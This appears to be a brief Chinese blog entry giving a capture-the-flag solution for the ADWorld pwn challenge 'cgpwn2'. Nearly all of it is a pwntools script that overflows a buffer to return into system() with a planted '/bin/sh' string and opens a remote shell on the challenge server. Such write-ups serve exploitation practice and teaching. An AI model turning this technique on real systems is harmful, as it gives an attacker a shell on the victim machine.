ADWorld Pwn cgpwn2

好像会点了^v^

1
2
3
4
5
6
7
8
9
from pwn import *
p = remote("111.198.29.45",55602)
p.sendlineafter("your name","/bin/sh")
strAddr=0x0804A080
sysAddr=0x08048420
payload=b'0'*(0x26+0x4)+p32(sysAddr)+p32(0)+p32(strAddr)
print(len(payload))
p.sendlineafter("here:",payload)
p.interactive()

发表评论

电子邮件地址不会被公开。 必填项已用*标注